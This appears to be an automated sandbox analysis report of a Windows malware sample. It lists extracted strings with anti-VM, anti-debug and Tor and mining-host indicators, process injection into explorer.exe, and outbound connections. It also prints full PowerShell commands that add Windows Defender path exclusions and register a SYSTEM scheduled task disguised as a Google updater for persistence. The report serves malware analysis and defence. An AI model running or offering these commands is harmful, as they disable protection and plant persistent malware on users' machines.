Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4574735535.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\HGFS`
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmhgfsP
Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>latestumma.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributelatestummaEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksbgsai2sls3h.resources
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def

Source: C:\Users\user\AppData\Local\Temp\latestX.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_00402910 FindFirstFileW,	2_2_00402910
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Code function: 2_2_004068B4 FindFirstFileW,FindClose,	2_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,	3_2_00429C40
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429870 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429870
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429A5C WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429A5C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429A30 DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429A30
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00429AB9 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,	3_2_00429AB9
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0042A378 InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,	3_2_0042A378

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cdttvvc	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

3_2_004124B2

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00830042 push dword ptr fs:[00000030h]	3_2_00830042
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00957CE1 push dword ptr fs:[00000030h]	3_2_00957CE1
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 5_2_02B6B0A3 push dword ptr fs:[00000030h]	5_2_02B6B0A3
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Code function: 17_2_02B160A3 push dword ptr fs:[00000030h]	17_2_02B160A3
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A50042 push dword ptr fs:[00000030h]	57_2_00A50042
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A87C11 push dword ptr fs:[00000030h]	57_2_00A87C11

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cdttvvc	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 3_2_0040B6B9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0040B6B9

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Google\Chrome\updater.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0040B6B9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0040B6B9
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00408F61 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00408F61
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0040C7CA SetUnhandledExceptionFilter,	3_2_0040C7CA
Source: C:\Windows\System32\conhost.exe	Code function: 60_2_00007FF6EB431180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	60_2_00007FF6EB431180

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 95.214.26.28 80
Source: C:\Windows\explorer.exe	Network Connect: 172.67.34.170 443
Source: C:\Windows\explorer.exe	Network Connect: 51.15.58.224 14433

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: cdttvvc.19.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: C:\Windows\Temp\whxcdqscjswq.tmp target: C:\Windows\System32\conhost.exe protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: C:\Windows\Temp\whxcdqscjswq.tmp target: C:\Windows\explorer.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\cdttvvc	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\cdttvvc	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Memory written: C:\Users\user\AppData\Local\Temp\toolspub2.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cdttvvc	Memory written: C:\Users\user\AppData\Roaming\cdttvvc base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 3_2_00830110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

3_2_00830110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Thread created: C:\Windows\explorer.exe EIP: 8791930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cdttvvc	Thread created: unknown EIP: 51B1930

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Writes to foreign memory regions

Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\conhost.exe base: C4498F9010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\explorer.exe base: A72010

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\latestX.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Program Files\Google\Chrome\updater.exe

Memory written: PID: 880 base: A72010 value: 00

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 6888
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 880

Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#nvjdnn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }	Jump to behavior
